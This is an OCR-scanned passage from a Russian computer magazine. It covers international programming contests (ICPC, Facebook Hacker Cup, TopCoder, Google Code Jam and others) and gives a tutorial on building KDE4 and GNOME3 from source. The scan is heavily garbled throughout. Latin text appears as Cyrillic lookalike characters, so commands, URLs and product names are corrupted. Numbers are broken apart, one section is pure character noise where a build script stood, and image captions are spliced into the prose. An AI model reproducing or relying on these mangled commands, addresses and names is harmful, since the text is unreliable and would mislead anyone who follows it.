неоднократно, но позволим себе повториться. История конкурса 
уходит корнями в далекие 70-е годы. Во всем мире это состязание 
считается весьма престижным, ведь, по сути, данный чемпионат 
проводится среди молодой программистской элиты. Крупные ком- 
пании каждый год внимательно следят за АСМ ІСРС, присматривая 
будущие кадры, ведь один из основных ресурсов ІТ-индустрии, это 
мозги. 

Чемпионат проводится под эгидой ассоциации вычислительной тех- 
ники (АСМ). Начиная с 1989 года, организацией соревнований зани- 
мается университет Бэйлора. В разное время спонсорами сорев- 
нований становились такие компании, как Арріе, АТ&Т и Місгозоіф 
однако с 1997 года по настоящее время генеральным спонсором 
является компания ІВМ. 

Россия впервые получила право на организацию полуфинальной 
Северо-Восточной Европейской группы в сезоне 1996-1997, и с тех 
пор команды наших вузов не раз завоевывали на чемпионате при- 
зовые места. Правила чемпионата таковы: к участию допускаются 
студенты высших учебных заведений, а также аспиранты перво- 
го года обучения. Студенты, дважды участвовавшие в финальной 



стадии олимпиады, или пятикратно принимавшие участие в регио- 
нальном отборе, не допускаются к участию. В каждой команде три 
человека, на троих у них один компьютер. Командам дается пять 
часов времени и от восьми до двенадцати задач. Заметим, что от 
уровня сложности этих задач у любого программиста средней руки 
попросту вскипит мозг :). Побеждает та команда, которая решит 
наибольшее число задач, затратив на это меньше всего времени. 
Решения участники пишут на С, С++ или 5аѵа и отправляют на 
тестирующий сервер. Какие именно тесты там крутятся, участники 
не знают, а задачу недостаточно просто решить правильно - нужно 
еще уложиться в определенные ограничения по времени, памяти и 
т.д. Каждая неудачная попытка решения — плюс двадцать минут к 
штрафному времени команды (которое изначально равняется нулю), 
так что пытаться и пытаться до победного не выйдет. С денежными 
наградами на чемпионате дело обстоит следующим образом: 
Команда-победитель ІСРС получает $12 000. Команды, получившие 
золотые медали, получают по $6 000. Команды, получившие сере- 
бряные медали, получают по $3 000. Команды, получившие «бронзу», 
получают по $1 500. Кстати, в этом году представитель ІВМ Марк 
Гуэйн сообщил: «Команда-победитель ІСРС получит 1 2 тысяч дол- 
ларов в качестве приза от спонсора турнира, компании ІВМ, а всем 
членам команд, завоевавшим золото, будет предложена работа в 
компании». Так что, деньги здесь даже не главное. 

ГасеЬоок Наскег Сир 

Когда: 

Предположительно декабрь-январь 

Где: 

В онлайне 

Сайт: 

[асеЬоок.сот/Ьаскегсир 

В этом году одна из крупнейших социальных сетей планеты 
(РасеЬоок) объявила об учреждении ежегодного конкурса по алгорит- 
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Финал ІСРС 



мическому программированию для хакеров со всего мира. Конкурс 
так и называется — РасеЬоок Наскег Сир. 

Первый «хакерский кубок» (201 1 года), к сожалению, уже прошел. 
Регистрация на соревнование была открыта с 20 декабря 2010 года 
по 10 января 201 1 года. Сам конкурс проходит в онлайне. Суть же 
соревнования такова: состязание делится на три этапа. Первый — 
квалификационный раунд, длившийся с 7 января 201 1 года (в 0:00 
ІІТС) по 10 января 2011 года (в 0:00 ІІТС). Участникам предложили 
три задачи, и чтобы пройти в следующий раунд, необходимо было 
в течение 72 часов решить хотя бы одну из них. Те, кто справился 
с заданием, были допущены к первому онлайновому раунду, кото- 
рый состоялся 15-16 января (3 подраунда по 3 часа в разное время 
суток). Из каждого подраунда была отобрана 1 000 лучших участников. 
Второй и заключительный онлайновый раунд прошел 22 января (с 
15:00 по 18:00 ІІТС). В ходе финала были определены 300 лучших 
хакеров (получившие по официальной футболке Наскег Сир) и 25 
самых лучших. Победители из числа 25 лучших могут рассчитывать 
на призы посерьезнее сувенирных маек: РасеЬоок платит $5000 
за первое место, $2000 за второе, $1000 за третье и утешительные 
$100 за места с 4-го по 25-е. Суммы, конечно, не заоблачные, но в 
будущем они, вероятно, возрастут, да и к деньгам прилагаются бес- 
платные билеты в Калифорнию и бесплатное проживание в кампусе 
РасеЬоок в Пало-Альто. Кстати, в первом РасеЬоок Наскег Сир побе- 
дил россиянин Петр Митричев, завсегдатай подобных соревнований. 

Тор Сосіег 

Когда: 

25—28 сентября 201 1 

Где: 

В онлайне и различных городах США. Финал Тор СоЬег 201 1 состо- 
ится в Форт-Лодердейл, штат Флорида. 

Сайт: 

іорсосіегсот и соттипіІуТорсобег.сотДсо1 1/ 

Широко известны во всем мире программерские состязания, про- 
водимые компанией ТорСоЬег Іпс. Часть соревнований проходит в 
Сети с частотой несколько раз в месяц (в зависимости от формата), 
но проводятся также и ежегодные турниры — Тор СоЬег Ореп и Тор 
СоЬег Соііедіаіе СЬаІІепде (для студентов) с очным финалом и вну- 
шительными призовыми фондами. С 2007 года учрежден также и Тор 



СоЬег НідЬ ЭсЬооІ Тоигпатепі, то есть турнир для школьников. 
Соревнования Тор СоЬег интересны тем, что здесь существует 
система рейтинга. Дело в том, что все соревнования здесь индиви- 
дуальные и каждое участие в онлайновом турнире влияет на рейтинг 
участника в этом виде соревнований, что существенно повышает 
интерес и способствует появлению азарта. Рейтинг был придуман 
компанией ТорСоЬег Іпс и по его образу и подобию позже были 
созданы Тез! ТЬе Вез! и российский СосІеФгсез. Но вернемся к Тор 
СоЬег Ореп (ранее Тор СоЬег Іпѵііаііопаі). Это ежегодный индивиду- 
альный профессиональный турнир по программированию, который 
негласно считается чем-то вроде чемпионата мира среди профи. И, 
в общем, заслуженно считается — это действительно один из круп- 
нейших ивентов такого рода, на котором собираются сильнейшие, 
хотя попытать свои силы может любой, кому больше 18 лет. В целом 
сообщество Тор Сосіег насчитывает почти 300 000 человек. Конкурс 
проводится по системе ТорСоЬег с 2001 года и включает в себя 
следующие виды соревнований: АІдогііЬт, Оезідп, Оеѵеіортепі;, 
МагаіЬоп, АгсЬіІесІиге, АззетЫу, Тезііпд, Вид Расез и Зіисііо. 
Суммарный призовой фонд Тор Сосіег Ореп 201 1 составляет $150 000 
и 100 поездок в Форт-Лодердейл (в зависимости от категории сорев- 
нований — либо для участия в финале, либо просто как наблюда- 
тель). Наиболее популярным из состязаний является АІдогііЬт, приз 
за первое место в этом формате составляет $1 5 000. Кстати, раньше 
деньги получали и победители регулярных онлайновых состязаний, 
но потом организаторы отказались от этой затеи. Советуем посетить 
официальный сайт компании и турнира, где можно ознакомиться с 
подробностями как общего характера, так и частного — по разным 
видам состязаний. 

боодіе Сосіе Лт 

Когда: 

6 мая— 29 июля 201 1 

Где: 

В онлайне. Финал очный, в 201 1 году состоится в офисе Ѳоодіе в 
Токио 

Сайт: 

собе.доодІе.сот/сос1е]апп 

Еще один популярный, уважаемый и довольно старый турнир — 
Ѳоодіе Сосіе Оат. Как нетрудно догадаться, проводит данное сорев- 
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Символика ІСРС 




♦ТтіМТііТІ 

ЪѴНАТ ЬАНбМЛбЕ 
00 ѴОІІ 5РЕДК? 

сойсцат 



Участие в ТорСосІег Ореп — 
большое достижение 



Отличная реклама Соодіе Сосіе .Іат 
2009 




25 лучших — финалисты РасеЬоок Наскег Сир 2011 



нование компания Ѳоодіе, история ивента ведется с 2003 года. 
Ѳоодіе Сосіе бат — соревнование международное, и помимо про- 
чего оно используется как средство для выявления лучших умов 
для возможной работы в Ѳоодіе. Да-да, выше уже было сказано 
о том, что основа и главный ресурс ІТ-бизнеса, это мозги, так что 

— ничего удивительного. Суть состязания довольно проста: есть 
набор алгоритмических задач, которые должны быть решены за 
фиксированное время. Что приятно, в отличие от большинства ана- 
логичных соревнований по программированию, участники Соодіе 
Собе бат могут использовать для решения задач любой язык про- 
граммирования и среду разработки по своему усмотрению. 

Чтобы принять в турнире участие, нужно иметь Соодіе-аккаунт, 
зарегистрироваться на сайте соревнования и принять участие в 
квалификационном раунде. Увы, в этом году отбор уже закончен. 
Ситуация с призами у Соодіе напоминает РасеЬоок Наскег Сир: 
первое место — $10 000, второе место — $2000, третье место — 
$1000. Места с 4 по 25 оплачиваются символическим призом в 
$ 100 . 

боодіе АІ СІіаІІепде 

Где: 

В онлайне 

Сайт: 

аі-сопІе5І.сот 

Университет Ватерлоо при поддержке компании Соодіе пред- 
лагает всем желающим (и умеющим) принять участие в довольно 
необычном состязании. Скооперировавшись, они организовали 
настоящие войны роботов. В основу конкурса легла игра Оаісоп 

— стратегия в режиме реального времени. Игра, в общем-то, про- 
ста: имеется двухмерная карта с планетами, каждая из которых 
характеризуется двумя параметрами — количеством войск и их 
приростом за ход. Планеты могут быть как нейтральными, так и 
принадлежащими одному из двух соперников. Количество войск 
на нейтральных планетах не увеличивается. Еще есть корабли (на 
планетах или в полете), из которых формируется флот. Цель, как ты 
уже догадался, захватывать планеты и преобладать на карте. Бота 
для игры можно написать на большинстве популярных сегодня 





Турнир РІапеПЛ/агс, проходящий в рамках Соодіе АІ 
СІіаІІепде 



языков — С#, баѵа, РуіЬоп, С++, Зсаіа, РНР, І_ізр, Назкеіі, ОСатІ, 
СоІІееЗсгірІ и так далее. Для этого понадобится лишь соответ- 
ствующий «стартовый набор», скачать который можно с сайта про- 
екта. В игре уже приняло участие более 4600 ботов от людей из 1 1 2 
стран мира. Хотя первый Соодіе АІ СЬаІІепде уже состоялся, и на 
сайте вывешены его результаты, организаторы до сих пор не реши- 
ли, что же делать с призами, а точнее — будут ли таковые вообще. 

В официальном РАО уклончиво значится: «Возможно. Мы над этим 
работаем». Однако деньги — это не всегда главное, принимать уча- 
стие в состязаниях такого рода можно и нужно просто «из любви к 
искусству» :). 

СогіеСир 

Когда: 

С сентября по январь 

Где: 

В онлайне 

Сайт: 

собесир.пі 

Данное соревнование очень похоже на описанный выше Соодіе АІ 
СЬаІІепде. Сто снова онлайновые битвы ботов, только на этот раз 
основанные на игре Оѵопп. Здесь, в отличие от Соодіе АІ СЬаІІепде, 
партии разыгрываются не 24/7 — показательные турниры проводят- 
ся каждые 3 недели. Стать участником можно, написав свою прогу и 
загрузив ее на собесир.п в период с сентября по январь (конкрет- 
ные даты уточняй на сайте конкурса — прием заявок на СобеСир 
201 1 уже закрыт, а на 201 2 еще не объявлен). Участие совершенно 
бесплатно, достаточно лишь создать аккаунт на сайте соревнования. 
Прога компилируется и запускается под Ыпих, а после компиляции 
обязательно проходит краш-тест. Если тест пройден нормально — ты 
в числе конкурсантов. Отправленное решение должно представ- 
лять собой один файл с исходным кодом размером не более 1.4 Мб. 
Писать можно на Разсаі, С, С++, баѵа, РуіЬоп, Назкеіі, баѵазсгірі 
(версии компиляторов и команды указаны на сайте). Контест, в 
общем-то, камерный, без могучих спонсоров и огромных призов, что 
отнюдь не делает его менее интересным. 



► 082 
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Финалисты РасеЬоок Наскег Сир в неформальной 
обстановке 

ІСРРС 

Когда: 

Конец июня 

Где: 

В онлайне 

Сайт: 

ісірсопіезі.огд 

Конкурс с долгой и богатой историей. ІСРР Сопіезі — это команд- 
ное ежегодное соревнование, которое проводится с 1998 года. 
Количество участников в команде неограниченно. Конкурс тра- 
диционно приурочивается к ІСРР (международная конференция 
по функциональному программированию) — каждый год за орга- 
низацию соревнования берется какой-либо крупный институт, и 
мероприятие всегда отличают необычные и интересные задачи. К 
примеру, в прошлые годы участникам уже приходилось сталкиваться 
с такими проблемами как необходимость приспособить пришельца 
вместе с его кораблем к жизни на Земле, управление спутниками 
на околоземной орбите с возвращением марсохода на базу и так 
далее. Задание дается всего одно, конкурс длится 72 часа (трое 
суток). Соревнование делится на два этапа: ІідЫпіпд гоипсі (оцени- 
ваются решения, полученные в течение первых 24 часов) и таіп 
гоипсі (оцениваются все отосланные решения). Решение может быть 
написано на любом языке (победители предыдущих лет писали на 
Назкеіі, ОЬіесІіѵе Саті, С++, Сіік и Оаѵа), главное — чтобы не воз- 
никло проблем с его запуском на тестовой машине. Призы на ІСРРС 
довольно скромные, так как эти деньги в первую очередь призваны 
помочь победителям посетить саму конференцию, на которой и про- 
ходит церемония награждения. 

АррЦр Оеѵеіорег СІіаІІепде от Іпіеі 

Когда: 

Прием заявок на новый этап стартовал 21 февраля 

Где: 

В онлайне 

Сайт: 

зоііѵѵа ге.іпіеі.сот/ги-ги/а гіісІез/іасІр-сЬаЦепде-3 

АррІІр Оеѵеіорег СбаНепде — международное соревнование раз- 
работчиков ПО, ориентированное на продвижение перспективных 
приложений, которые способны изменить впечатление пользовате- 
лей от работы с нетбуками и планшетными ПК на базе процессоров 
Іпіеі Аіот. В прошлом году в конкурсе участвовало 350 приложений 
из самых разных стран мира, и в числе победителей оказались и 
наши соотечественники: «приз зрительских симпатий» и премию 
в $60 тыс. получили российские разработчики из Самары Артем 
Шерстобитов, Илья Грачев и Николай Чолаков с игрой Аісбету 




Победитель РасеЬоок Наскег Сир и живая легенда 
спортивного программирования — Петр Митричев 




Радостные победители Тор Сосіег Ореп 



Сіаззіс. Отличился и Дмитрий Рыжков, занявший второе место в 
номинации Ноте Іппоѵаііоп Рпфесі: с игрой АР Ноте. Его премия 
составила $8 тыс. Правила конкурса, в целом, просты: нужно пред- 
ставить на суд жюри конкурса приложение, относящееся к одной из 
следующих категорий. «Лучшее коммуникационное приложение», 
«Лучшее медиаприложение», «Лучшее информационное приложе- 
ние», «Лучшее приложение для синхронизации», «Лучшее игровое 
приложение», «Лучшее специальное приложение для Франции». 
Кроме того, приложения участвуют в розыгрыше «гран-при» в 
четырех дополнительных номинациях: «Лучшее приложение для 
различных платформ», «Самое элегантное приложение МееѲо», 
«Лучшее приложение для планшетника/нетбука» и «Премия самому 
ценному разработчику». Выиграть здесь можно не только деньги, но 
и безумные вещи, цитируем: «Полностью оплаченное путешествие 
в Антарктику, включая 700-мильную экскурсию на Южный полюс, 
или получи приз 50 тысяч долларов и останься в тепле родного 
дома» :). Также разыгрываются: возможность посетить конференцию 
ТЕй, совершить пятидневное путешествие по России, включающее 
сверхзвуковой полет на военных реактивных самолетах, поездка на 
Сотіс-Соп и так далее. т 
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КРОЕМ 

ОДЕЖКУ 

Самостоятельная сборка и оптимизация К0Е4 
и 6ММЕЗ 



• КОЕ и 6Ы0МЕ развиваются просто сумасшедшими темпами, пред- 
лагая пользователю новый функционал, улучшенную стабильность 
и устранение ошибок. Но путь релиза в репозитории дистрибутивов, 
как правило, долог: мэйнтейнер собирает пакет, всесторонне тести- 
рует его, и только после одобрения он попадает в основной репози- 
торий. А попробовать новую версию хочется уже сейчас. 



Подготовка для сборки 

Не все исправления и нововведения доходят до насоченьбыстро. 
Например, на моментнаписания этих строк была доступна версия КйЕ 
5С 4.6.2, а в официальном репозитории ІІЬипІи 1 0.1 0 значилась только 
4.5.1 .Аналогичная ситуация и в репозиториях других дистрибутивов и 
операционок — орепЗІІЗЕ 1 1 .4, Оепіоо Ыпих, ЕгееВВО, ОрепВВй ит.д. 
Есть, конечно, и другие причины для самостоятельной сборки. В пакете 
из репозитория могутбытьактивированы не все функции или возмож- 
ности, которые хотелось бы использовать в работе. Или обнаружена 



ошибка, которая мешает нормально юзать программу или открывает 
брешь в системе. Еще вариант: сборка получиласьтяжеловесной, в 
ней присутствуют ненужные приложения, и появилосьжеланиееечуть 
«подрезать», чтобы сэкономить системные ресурсы. В общем, причины 
у каждого свои. Поэтому сегодня рассмотрим, как самостоятельно со- 
братьсвои версии КйЕ и ѲІМОМЕ. Все операции будем производить на 
Ыпих Міпі 10 с рабочей средой 6ІЧ0МЕ. В других дистрибутивах процесс 
практически полностью аналогичен. Для экспериментов рекомендую 
создать новую учетную запись, в которой и проводить тестирование. 
Иначе при первом запуске могут быть внесены изменения в профиль, и 





КРЕ в ІІЬипЩ 



Чтобы в ІІЬипІи получить версию КОЕ, близкую к последней, следует 
подключить репозиторий киЬипІи-рра/Ьаскрогіз: 

$ зисіо асісі-аріі-герозііюгу рра : киЬигтІи-рра/ 

Ьаскрог1:5 

$ зисіо ар1:-§е1: ирбаіе 
$ висіо ар1:-§е1: іпвііаіі киЬип1:и-сІевк1:ор 

залогиниться со старой версией неудастся. Кстати, подобную рекомен- 
дацию могудатьитем, кто юзает несколько дистров с общим /боте. Еще 
один немаловажный момент — пользователь должен получать доступ 
кзисіо. Для этого — включаем его в группуабтіп (в Ыпих Міпі). Далее 
настраиваем среду сборки. Разработчики приготовили рекомендации 
и скрипт ~/. Ь и і ІсІ - со п Еі д , устанавливающий необходимые глобальные 
переменные ( ) и настройки для -/.ЬазЬгс. Некоторые пара- 

метры внутри закомментированы, следует внимательно их просмотреть 
и определиться с их необходимостью. Например, при сборке в 64-бит- 
ной системе надо обязательно установить: 

ехрогі І_ІВ_5І1РРІХ=64 

Чтобы не собирать ксіезбк, комментируем строку «аііаз 
таке=такеоЬ]». Аналогично определяемся, нужна ли пересборка 
РуК0Е4и0В05. 

Обращаем внимание и на «[ипсііоп стакекбе», в которой определены 
параметры сборки при помощи стаке. Так, по умолчанию компиляция 
производится с параметрами: 

стаке $К0Е_В1Л1_0 

\ -ОСМАКЕ_ІІ\І5ТАІ_І__РКЕРІХ=$КОЕОІК 
\ -ОСМАКЕ_В1ЛЮ_ТУРЕ=с1еЬи§-Ри11 
\ -0К0Е4_ВІЛІ_0_ТЕ5Т5=ТКІІЕ 
пісе таке -]2 
таке іпвТаІІ 

Числовой параметр после флага '-}' определяет количество по- 
токов и обычно выбирается по формуле (Х+1 ), гдеХ — число СРІІ. 
Если устанавливаются разные версии КОЕ или варианты сборки, 
достаточно изменить путь $К0Е01П. Упростить весь процесс можно 
при помощи скриптов кбезгс-ЬиіІб І ксіезгс-Ысі.кбе.огд ) и ЬиіІсМооІ. 
Первый разрабатывается в рамках комьюнити КОЕ и более популя- 
рен. Предварительная настройка, в том числе выбор модулей для 
установки, производится при помощи конфигурационного файла 
-/.ксІезгс-ЬиіІсІгс. В архиве есть пример, копируем его и правим. 

$ ср ~/ксІезгс-Ьиі1сІ-1 . ІЗ/ксІезгс-ЬиіІсІгс-затрІе \ 

~/ . ксІезгс-ЬиіІсІгс 

Параметров внутри предостаточно. Новичкам я бы посоветовал начатье 
изучения этого файла, это снимет впоследствии много вопросов. Да, и не 
за будь установить переменную: 

Ые-1ап§иа§ез ги 

Модули настраиваются в конструкциях: 

тосіиіе <тосІи1е-пате> 
епсі тосіиіе 

Теперьзапускаем: 

$ зисіо ./ксІезгс-ЬиіІсІгс 




Новая версия рабочего стола содержит значительные 
усовершенствования 



Скрипт самостоятельно скачает исходники, настроит среду, собе- 
рет, установит и протестирует результат. Поддерживается несколько 
дополнительных параметров, так, чтобы повторно не загружать 
файлы, добавляем ' — по-зѵп'. Для теста конфигурации используем 
'--ргеІепсГ, в этом случае будут проверены все установки без выпол- 
нения процедуры загрузки и сборки. И, наконец, '--ге^гезЬ-ЬиіІб' 
подчистит временные файлы, чтобы можно было начать процесс 
сборки повторно. Для работы Мезгс-Ьиіісі понадобятся установлен- 
ные Регі и Іі Ьѵѵѵѵѵѵ. Надо сказать, потребуется много места на харде. 
Так, для сборки ці-сору, кбезиррогі, ксІеІіЬз, кберітІіЬз, ксіебазе 
нужно около 7 Гб, но я бы выделил не менее 20 Гб на временные 
файлы и готовую среду. Дополнительные компоненты — это еще 
плюс несколько гиг. 

Получаем исходники 

Чтобы более тонко настроить КОЕ, лучше провести ручную сборку без 
средств автоматизации. Все действия рекомендуется производить в 
подкаталоге ~/кбе. В -/ксіе/згс закачиваем исходные тексты, а в ~/кбе/ 
ЬиіШ будет размещена готовая сборка. К слову, указанные ранее сбо- 
рочные скрипты устанавливаюталиасы сз и сЬ, упрощающие быстрый 
переход вуказанные каталоги. 

Если подключен репозиторий киЬипІи-рра/ЬаскрогІз, то можно про- 
сто ввести: 

$ зисіо ар1:-§е1: іпзіаіі арІ-ЬиіІсІ 

В процессе позволяется выбрать оптимизацию под определенный 
тип процессора. 

$ зисіо арІ-ЬиіІсІ іпзіаіі киЬиггІи-сІезк-Іор 

Сборка при этом будет проведена с параметрами, указанными в/еіе/ 
арі/арІ-ЬиіІсІ.сопГ Такой подход, какправило, предоставляет нам мало 
возможностей по оптимизации, но зато пакеты впоследствии легко 
обновить. При помощи а рі часто удобнее просто вытащить исходники 
и, главное, зависимости для сборки: 

$ зисіо ар1:-§е1: зоипсе киЬигтби-сІезкІіор 

$ зисіо ар1:-§е1: Ьиіісі-сіер киЬиггІи-сІезкІор 

Список пакетов, необходимых для корректной установки, очень 
большой. И кроме стандартных инструментов сборки, таких как ЬшШ- 
еззепііаі, стаке, бохудеп, в нем присутствует множество заголовоч- 
ных файлов разных приложений и библиотек. Некоторые из зави- 
симостей необязательны, но впоследствии во время сборки может 
оказаться, что не активирован какой-то элемент. Например, если не 
установлен ІіЬхіпе-беѵ, КОЕ будет сконфигурирован без поддержки 
мультимедиа. Сам проект предлагает ОМ; репозитории [ диіскдіГкбе. 
огд ] и тарбалы [ ^р.кбе.огд/риЬ/кбе І. Доступен и 5ѴІ\І, но его поддержка 
прекращается. Поэтому создаем файл: 
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ІШІХОЮ 





Частично оптимизировать приложение можно при 
помощи арі-ЬиіІсі 

$ папо~/.діІсоггіід 

[игі "§11: : //апоп^і-1: . ксіе . ог§/" ] 
іпз1:еасІ0Т = ксіе: 

[игі "§і1:(а)§і1:. ксІе.ог§: " ] 
ризІіІпзІеасІОТ = ксіе: 

И закачиваем. Минимум, что потребуется, это: 

$ §І1: сіопе ксіе: ксІеІіЬз 
$ §І1: сіопе ксіе: ксіе-могкзрасе 
$ §І1: сіопе ксіе: ксІерітІіЬз 

Если нужен больший функционал, то ставим кбетиШтебіа, 
кбеагіѵѵогк, ехігадеаги любые другие приложения и плагины. 

Также могут понадобиться исходники ОТ Здесь два варианта. 
КОЕ'шный, с параметрами оптимизации, подобранными под КйЕ, 
багфиксами ит.п. 

$ §ІТ сіопе Ые^Т-Ме 

Или Ѳііогіоиз, предлагающий «чистый» 01; или патченный: 

// Ванильный (2Т 

$ §ІТ сіопе §іТ://§іТогіои5.ог§/р1:/р1:.§і1: 

// С патчами 
$ §ІТ сіопе \ 

§ІТ : //^ііогіоиз . ог§/+ксІе-сІеѵе1орег5/д1:/ксІе-дТ . §ІТ 

Если ранее были сделаны изменения в -/.Ьазбгс и -/.ЬиіШ-сопбд, о 
которых говорилось выше, переходим в каждый образованный под- 
каталог и последовательно даем команду: 

$ зисіо стакексіе 

Здесьлучше написать простенький скрипт, который автоматизирует 
процесс: 



■ -иіяіІЧт ******* II ь*1 ЧІЧ 

I 14 ПН1 МІ к гісрі гг* 
іііЬштш* т 

ФФІІЧИ1 ЧЧѴЧЯ Е---Ч-І 
І*Г! МЧ I ******** ■“1*1 *|| | 

И1 ІІИЧМНІ ЭДІ МІІ 

ГМі 

» и. ррьм* 

Е^І-Ьп-г ГііікмГіт.к.игіг 1 |№НІ ШШ ІЕМГ ЙШДІИІІІ.РІ I 
сШіяг* г>*Гы іІОМЛ (*МИГГ ІП№ БЩш№<МІІкі.к І 

ІРчМ* ІБРВЧ •■тщщт ■ ;шяг ци| . . |д>4 Нф| |*і ь | 

■ нгі |>Р4 ■ 1 1 * !імгі | рч г <■ кии ь;іниі іілшіь- пш< Ыі| . г*# і ■ | рч ѵ ■ г 

Еі-І-Кѵ-т іеиіі^ .ь ін>т Ы-Ьгм 4і*МИГ 43№ гт 

шГіякі ГіЫьмі«н.і : {чЧ ІІЕИКІ ЕіРЩі ИМ*" ИШимт> I 

■ чыи чія гизя. нн- м іш<мгі ыы им 

|№й>-р ПЛІИР^І РМПІІГРЧ “ ПМС № І.ШШ I 

■ «І^*і р і-ЫіІЧ«**Е -ч— нг “ м*Е Жі[і іСРѴДѴІ 



Й4 М-гм-і^..і 1*,м ( 
штл рдеіім-г&Ррі чмр і | 

іі і^:«і 

**■ |-Ф«|і«і;чіы Г ! ьніг I 

МН ЬМЛІММкІ | ІІ К МН- к 
Н4ІТ нАШ 
■і'іМГ -4ШІ 
** ьмрмі 1*4 г.Ы| I мцр I 

При использовании стаке вместо конфигурирования 
следует отредактировать конфиги 

параметров, причем значительная часть из них, ктомуже, проком- 
ментирована. Разобравшись, можно легко подключить или отклю- 
чить сборку модуля или подкомпонента, расширив или, наоборот, 
урезав функционал. Например, функции асІсІ_5и ЬсІігесІогуО и асИ_ 
орІіопаІ_5иЬсІігес1:огу() в С МакезІД зіз.М задаютсписокзагружаемых 
и используемых при сборке зависимостей. Потихоньку обходя все 
подкаталоги, определяем модули, которые следует включить или 
отключить. Конечно, многие функции затем можно деактивировать 
уже в рабочей системе, но если стоит вопросуменышения веса и 
нагрузки, то решениелучше принять сейчас. На слабых системах 
можноубрать поддержку семантического десктопа зігід і и перотик, 
кберіт-приложения. Если видеокарта нетянет, то убираем под- 
держку эффектов в КѴѴіп и ОрепОЕ полностью. На нетбуке удаление 
Акопабі обеспечит прирост во времени загрузки чуть ли не на 20% 
плюс меньшее потребление ресурсов. Крометого, можно убрать со- 
вместимость с КйЕЗ, сегодня в этом уже нет острой необходимости. 
Также можноубрать флаги газіеги Ігасе при сборке ді-диі, это сразу 
облегчитХ, как минимум, на 30 Мб. 

На этом этапе преимущество получают гентуш ники достаточно из- 
менить ЦЗЕ-флаг [ депІоо.огд/бѵп/иБе-іпбех.хппІ ] — и дело в шляпе, в 
других дистрах исходники придется рыть самому. Кслову, последние 
стейджи в Оепіоо используют Х2-сжатие, в итоге — архивы с КйЕ4 
тянут на 200 Мб меньше (1 ,8 Гб против 2 Гб). Крометого, можно пойти 
на более радикальные меры. Например, вместо кѵѵіп использовать 
орепбох-подобный оконный менеджер. Сейчас находится в активной 
разработке Апбсо, представляющий собой 014/Х1 1 оконный менеджер 
+ рабочий стол (как КйЕ+КѴѴіп). Он не связан с ксІеІіЬз, а потомулегкий 
и не нагружает систему. Главное, что он позволяет использовать мно- 
гие приложения из КйЕ. Минус — текущая версия 0.2 пока сыровата и 
содержит минимум функций. Загрузить Апбсо можно из ОіЕ 



ссі $К0Е_ВІІІІ_0 
■Рог сііг іп 
ЫеІіЬз 
ЫерітІіЬз 
... и т.д. 

у 

сіо ссі $КОЕ_ВІЛЮ/$сІіг; стакексіе 2> /сіеѵ/зісіоиі:; сіопе 

Сборка КОЕ производится при помощи стаке, команда ./сопбдиге, к 
которой все привыкли, здесь не используется. Все дополнительные 
параметры задаются непосредственно в строке запуска стаке или 
путем правки вспомогательных скриптов СМакезЫзІзТхІ и фай- 
лов с расширением *. стаке. Практически в каждом подкаталоге 
можно найти подобные настройки. Внутри описывается множество 



$ §І1: сіопе §і1://§і-1ІіиЬ.сот/ап-1ісо/ап1ісо.§і1: 

Обеспечиваем загрузку 

Чтобы вместо СйМ использовать КОМ, просто прописываем «/изг/ 
зЬіп/кбт» в /е1с/Х1 1/беІюиІП-сІізрІ.ау-тападег. Теперь осталось 
занести в -/.хзеззіоп или -/.хіпіігс строку «зіагікбе» и зарегистри- 
роваться в системе. В дистрибутивах, базирующихся на ОеЬіап, 
общесистемными являются файлы в /еіс/аиегпаііѵез. Среди 
н их х-ѵѵіпбоѵѵ- та падег является си мл инком на оконную среду, а 
х-зеззіоп- та падет — менеджером сеанса. Для выбора нужной сре- 
ды в окне регистрации можно создать файл /изг/збаге/хзеззіопз/ 
кбе4.безк1;ор примернотакого содержания: 

$ зисіо папо /изг/зЬаге/хзеззіопз/ксіеА.сіезкІор 

Ехес=$Н0МЕ/ксІе/Ьіп/5І:аг1:ксІе 
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Параметры ЛНВиіІсІ 



ТгуЕхес=$Н0МЕ/кбе/Ьіп/з1:аг1:кбе 

Мате=КйЕ4 

Сборка 6ЫОМЕЗ 

К мажорным релизам сборщики дистрибутивов относятся насторожен- 
но, ведь первые версии, какправило, сыроваты, да и не содержат всех 
функций. Исправления и более полноценную среду 6ІЧ0МЕ мы получим 
уже скоро вместе с обновлением 3.2. Чтобы пользователи могли сразуже 
познакомиться с новой версией, сразу после анонса было предложено 
два Ыѵе-дистрибутива: на базе орепЗІІЗЕ и Ребога ( дпотеЗ.огдЛгуіі. 
Мт!). Сейчас третий гномдоступен во всех свежих релизах этой весны 
— орепЗІІЗЕ 1 1 .4, ІІЬипІи 1 1 .04 ІЧаФу ЫагѵѵЬаІ и Еебога 1 5. 

Те, кто работают в ранних версиях системы или дистрибутивах, вроде 
Ыпих Міпі, могут подключить РРА-репозиторий «6Ы0МЕ 3 Зіаск». 
Кроме собственно гнома, мы подключаем и Ѳік+З. 

$ біісіо абб-арі-героБІіогу рра : иЬип1:и-бе5к1:ор/§потеЗ-Ьиі1б5 
$ біісіо ар*-§еі: ирбаіе 
$ вибо ар1:-§е1: іпзіаіі ^потеЗ-вевзіоп 

Запускаем командой: 

$ §поте-5Ііе11 --геріасе 

Или просто выходим и регистрируемся повторно, выбрав ѲКІОМЕЗ. Но 
хочу предупредить, что на момент написания этих строктам была са- 
мая первая сборка, и в Ыпих Міпі она не работала должным образом. 
При помощи АРТ мы можем вытянуть и исходные тексты для само- 
стоятельной перекомпиляции. Сам проект предоставляет в открытый 
доступ Оіі-репозиторий ( діі.дпоте.огд ) и РТР-сервер с архивами [ б:р. 
дпоте.огд/риЬ/(ЗІ\ІОМЕ) . 

Для сборки среды ОІЧОМЕ и приложений используется специальный 
скрипт на РуіЬоп — бНВиіІб [ беѵеІорег.дпоте.огд^ЬЬиіІб ]. Забираем 
последнюю версию из Ѳіі и устанавливаем обычным образом (потре- 
буется пакетдпоте-соттоп): 

$ §іі: сіопе §іі://§і1:.§поте.ог§/дІіЬиі1б 
$ сб дЬЬиіІб 
$ таке --Р Макеіііе. ріаіп 
$ таке --Р Макеіііе. ріаіп іпзіаіі 

Для корректной работы бНВиіІб требует, чтобы переменная РАТН со- 
держала подкаталог ~/.ІосаІ/Ьіп. 

$ есЬо РАТН=$РАТН:~/ . Іосаі/Ьіп >> ~/.ЬавІіпс 



Настройка параметров сборки производится в конфигурационном фай- 
ле -/дИЬиіІбгс. В архиве есть готовый пример, который берем за основу. 

$ ср ехатріев/затріе. д’ЬЬиіІбгс ~/ . дЬЬиіІбгс 

Файл разделен на несколько секций, где описываются репозитории, 
устанавливаемые модули, каталог для установки, флаги оптимизации. 
Полный список модулей можно найти на специальной странице Ііѵе. 
